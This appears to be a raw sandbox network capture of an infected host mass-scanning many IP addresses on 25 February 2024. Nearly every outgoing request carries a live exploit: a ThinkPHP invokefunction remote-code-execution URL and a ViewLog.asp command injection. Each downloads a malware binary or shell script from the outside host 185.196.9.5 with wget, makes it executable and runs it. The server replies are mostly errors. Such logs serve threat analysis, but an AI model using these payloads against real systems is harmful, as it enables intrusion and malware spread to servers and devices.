Feb 25, 2024 19:04:58.573836088 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:58 GMT Date: Sun, 25 Feb 2024 18:04:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 38 26 23 34 36 3b 37 35 33 36 36 62 36 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.95b0f748.1708884298.75366b61</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1012	192.168.2.15	39140	95.68.110.34	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.421128035 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.919040918 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1013	192.168.2.15	58416	95.101.45.18	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.436662912 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.660819054 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:58 GMT Date: Sun, 25 Feb 2024 18:04:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 38 35 65 36 63 63 31 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 38 26 23 34 36 3b 32 38 61 63 61 62 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.885e6cc1.1708884298.28acab82</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1014	192.168.2.15	46122	95.86.73.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.447546005 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1015	192.168.2.15	35836	94.187.235.72	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.470001936 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1016	192.168.2.15	54850	95.164.255.139	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.494014978 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.592461109 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1017	192.168.2.15	57576	95.100.170.202	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.516462088 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.815673113 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:04:58 GMT Date: Sun, 25 Feb 2024 18:04:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 36 61 61 36 34 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 38 26 23 34 36 3b 62 35 33 65 61 62 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c6aa645f.1708884298.b53eab6</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1018	192.168.2.15	58470	94.123.133.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.583808899 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1019	192.168.2.15	57426	62.29.80.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.589457989 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1020	192.168.2.15	55158	95.80.205.108	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.617980003 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.812685013 CET	420	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:58 GMT Server: Apache/2.4.57 (Ubuntu) Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1021	192.168.2.15	60376	95.216.51.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.618105888 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.813302040 CET	455	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:58 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1022	192.168.2.15	46702	94.137.21.119	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.728028059 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1023	192.168.2.15	43912	95.128.135.234	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.797514915 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:58.976948023 CET	199	IN	HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1024	192.168.2.15	43568	95.181.161.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.827893019 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:59.024163008 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Sun, 25 Feb 2024 18:04:58 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1025	192.168.2.15	56300	95.76.222.54	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.895719051 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:59.109642029 CET	465	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:58 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_wsgi/3.4 Python/2.7.5 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1026	192.168.2.15	46108	95.56.143.227	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.973402977 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:59.243311882 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:59.243532896 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
1027	192.168.2.15	49882	95.57.251.168	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.984069109 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:59.265691042 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:59.266196966 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
1028	192.168.2.15	36396	95.101.193.29	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.987740040 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:59.317203999 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:59 GMT Date: Sun, 25 Feb 2024 18:04:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 34 62 63 37 31 37 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 39 26 23 34 36 3b 32 63 34 66 32 65 33 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.464bc717.1708884299.2c4f2e36</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1029	192.168.2.15	47906	94.182.117.180	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.122065067 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.455059052 CET	259	IN	HTTP/1.1 501 Not Implemented Connection: Keep-Alive Content-Length: 121 Date: Sun, 25 Feb 2024 18:04:46 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>
